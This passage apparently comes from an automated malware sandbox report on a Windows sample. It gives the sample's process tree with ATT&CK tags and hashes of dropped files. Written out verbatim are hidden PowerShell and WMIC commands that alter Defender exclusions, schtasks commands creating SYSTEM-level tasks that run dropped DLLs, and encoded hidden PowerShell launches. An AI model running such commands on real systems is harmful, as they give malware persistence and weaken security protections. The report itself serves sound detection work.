C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2200
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"4⤵PID:2732
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True5⤵PID:2752
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1168 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:1228
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\WIQLPldOU\JAmYEH.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "zuAKRFeuERsPXGg" /V1 /F3⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:1680
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "zuAKRFeuERsPXGg2" /F /xml "C:\Program Files (x86)\WIQLPldOU\VTLAcVU.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2932
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "zuAKRFeuERsPXGg"3⤵PID:2108
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "zuAKRFeuERsPXGg"3⤵PID:1712
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "lJTDNNrzcsGlGa" /F /xml "C:\Program Files (x86)\qMeQRvtmXyxU2\BXTvnkf.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:1232
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "VRuKNmtcmCQGr2" /F /xml "C:\ProgramData\JHBMAPUCCwSCzfVB\UmtwLjW.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:1748
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "UZNAYPGMDJwYFtgCO2" /F /xml "C:\Program Files (x86)\wmJzyKeAXJXSYcIjGXR\GxKfCDj.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2984
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "dnucZiIKRABpvEFHHbL2" /F /xml "C:\Program Files (x86)\ixMyiQryENPMC\SMzQqLv.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:1756
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "QlZOxIqYpWgOKmXex" /SC once /ST 12:04:58 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\hwSlakOgexbeQMmf\SuOjFSjU\yieQruj.dll\",#1 /XdidF 385132" /V1 /F3⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:940
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "QlZOxIqYpWgOKmXex"3⤵PID:960
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gYQNStpqGWmiKXVBK"3⤵PID:3060
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 592 -s 15643⤵
- Loads dropped DLL
- Program crash
PID:2384
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\hwSlakOgexbeQMmf\SuOjFSjU\yieQruj.dll",#1 /XdidF 3851322⤵PID:1676
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\hwSlakOgexbeQMmf\SuOjFSjU\yieQruj.dll",#1 /XdidF 3851323⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:388 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "QlZOxIqYpWgOKmXex"4⤵PID:2232
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {EBF85767-EB97-4DE1-99E5-71F5A6E196C3} S-1-5-21-2660163958-4080398480-1122754539-1000:FCNAHWEI\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
PID:2076 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1492 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2384
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2496 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1904
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2800 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2768
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2428
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:908
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2084
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD578e82050617974f1ff8a37090ea12bfe
SHA17a8578d0ac2236030a92f71864de752af78324a4
SHA256ea3cd873393fb96f81796c5fd537835c04785ef8e529fa9387a6f100f57e62bb
SHA512e628ff877ef1387d4db4eff40b4b55328b3fd7cbf2ca62693f6c341c4f680a3955657a138babde7fb1894b78f596009e29d026a9084812e5435698fafc3a3c8c
-
Filesize
2KB
MD5a6c57fd4a65970038de35c008a101149
SHA18fff9ae0fac797311e229cbcd76e35fd3a2a867a
SHA256b5e2834fce5629d0cff524d8f9e823b09612da3349db26da1496cf9946f20264
SHA5121fcea1b4d4ad5f831a27088f6b3c0d4cdae3527c819a0e161c23a1f245b94681820d4ef42ca1c7b560ff277a6807114af1f1919aa5437a33df7ad70eb842d001
-
Filesize
2KB
MD56766b28c7ed523add858e79d3539f5ac
SHA17dff5176353a8d40e3ad0106f692359d70dd6325
SHA25621393690110cc20ee59ea0204ab7cb17e91453efada7795afc3e5474b2607353
SHA512f7708b19ea411d3ba3d814d9e45fb363aa6ab18e15a854a1b557faa929e136bf4e56caf8f21d59c1f3f9801a9c72bca6a667d22935285037b43a771ffa25eb2b
-
Filesize
2KB
MD53979273f71de2e08473e24d3cd366041
SHA12969eb18f0756607d340674ae0200eaeb3c35b8f
SHA2565f2a62220e8f145490f64892b663f3633356fe1cae7c13bce26f8eefee92b428
SHA512ed0f271461adc23b6b753154cdbf15d11ba8d3e067445cf040eb21b9c76a755be372682c6af2e017ee1bcf6a7790df51cfcf8ac8a7266cbc9660ff7f97f2c36d
-
Filesize
2.0MB
MD5ced365f9643975d49a2e8616d4958271
SHA1f4dd29af853b85c881e8d1e54eddfb8afd554350
SHA256c8c0ae06b0ab0776f3009f42f142dc83efd1c0068a835db62523b6178dbe0b98
SHA51287ade4aa1e236576391473bb680df4b70abd427ab5d359d0180c3ccffa9bcf55c3b0a9e133c2bd8d050b68577a30561b32fc73d58c382e6af6ce72155592cd1b
-
Filesize
2KB
MD59dff49bf252628ff03ea512f5ee5b48e
SHA11e66c2d0dee0c9e4f5082bdc695b1b80e1547cbb
SHA256324ae4b156b3ac87670999f9c746a793d03c2eac96a3bb520a56fe6a78f02f92
SHA512397657bc2fb2e6d92b2fedc2a3d618ae72504289b0cdc04697aa41404fbd445e2f52093ace7488290f45a1c8eb855001a73eccd67bd6e1e997759ade192015d7
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
10KB
MD5f4e6182492070cb543a4fe63e445be52
SHA13c4506190911234dd99f57ccb65ba24e83aeb243
SHA256ff3a0fcdd9c46fa8f79a467e9912c08a362acde585720e885e38b8af2b9f90e8
SHA512022d2285d678a090b7999f1a053c1ab66d5d9bda725c73ff2a86712736318ed67b4b23098a6d5098d146d45ffd3ff3c1ed69cbdbe151cbd9228b849c79d624d7
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD55cd044486b80c6e841b2722e989e1cb6
SHA108c78aab755d64ef696d1eb45db6743fff2dac4c
SHA25636038d602d662f4bcb2713762ea58b0168d187fb85240e6160cb5039bd88857a
SHA51299ad6c8b17196ee2d92874c3deda20c2ec3dd2dfec564c23631333ae73b1a52556dfa7d1a0da12fc9d744a350f3b72dea7f7486047046fbfd020daed0c79af14
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\P228LO6DLMQ3NFM4T36T.temp
Filesize7KB
MD55986b2f2b28e355c43f919351583f550
SHA1a034fba89b9e2325a1f3458f4345cc5f2728f9d7
SHA25628ea3efaa50b59a491526f8126237cf5333e9096d6a538029d0cd993e31df708
SHA512ef5e6e48156d7bb235a9615449263adcf5bb93e78455b89679797fbfaf77045a38c97e06e9c47a9bbddcf6f450737ed17ba545d1ee56e299938f1f4f9dae1c60
-
Filesize
7KB
MD5b6c933fc421b31948573cf17f1b861d9
SHA17e82d07f5c81f21cff58f42d159a368d348e038b
SHA2564d6ca74c65bc8673600e025a974727f0ecca0751c897ec04311881a3645266e0
SHA512a7a8d601961c6bb92ee908304de0e757d7496433cbb13a295472472b4804dce020571768b30b9413b159dbe5042981b0c1f14cb454de16b365533b35f1d9c2bd
-
Filesize
9KB
MD500adda0acbb9d3b2f55856ccd348f701
SHA15b92b0cec495d7514e3c349088349518b9994cb2
SHA256ad9afb4d80859d5014ded2f1d5f2dd86325815b0082531b9c345bc3afea653d6
SHA512067e35e2ff68c83c8d9eca3180ee39211e4543b720bfd64aec042c7568fc9ce09291d77f5a01c01846f49cf7c2413fd4de1cec86931c8f8c6110a19b5d5f46af
-
Filesize
6.5MB
MD5dedb1c194824fc460bb54a29231e7240
SHA194943c13afad6abd59dd21bad35daf5f6fe5edb4
SHA256351aa933a9364b6ed96c4cbabb40092c3602b7f5b1b104a5db6272787bf40d6a
SHA512929bdf4c788873bf78568a34d96683953873daae62c53ba8a7114c6fd0385c0b8ae5326b2ab0927ca107651e1d3e5a181c958c314eb310b2198f92332a8799c9
-
Filesize
5KB
MD56c55ddeac355116a33abc78e40f7f33d
SHA11e33cce73fa75d1131e5d9d38b08436ecf8d9fe1
SHA2563171d9d7bf7913ff2cb6f84c0d46bbfcd72c81dcf66287680c08926c3f9e5b54
SHA5127cd9502b4c0d65a8f9c34eacc67fb250751746bea5c2cbce4b8a73b9dad6524984ca544e54ada0ff1ddc6eebb8ee0efbe6317e13c0f68179ad6004fd9fc08ff9
-
Filesize
6.4MB
MD5c60027d8e4423486276969c17bebe707
SHA15695a7b9ad0b7b8ee600434829278867f782f4ad
SHA256327bdd49b6c0d2fcfd63f95b83ed92a003b29bb594f7b3fa78cf5921009edba9
SHA512e55f772bb5b1d2a82dbaecf9f3434f681d58cd6f37a55cbfd43f03c9f087f6829d1806a1d34c166da7d68bc31caa4960ada013b8c0810fd76574583002ab9066
-
Filesize
6.7MB
MD5f6a0a7af0b068607140be78b77689a9b
SHA1705aec54faa1be9b9c89a57bfc6b30998b767ffb
SHA25644ec6207b290941976105df124c2d65ad38d4e6f80b235ff3f23cd8674bc9fc8
SHA512735c10604854776491b74f0d8521878bd61163e98672df55058b0b4a1cd372295f59e5eea96676c92e6a981bd2c0caf093384de9d0c6c54513fbd03075ab9acd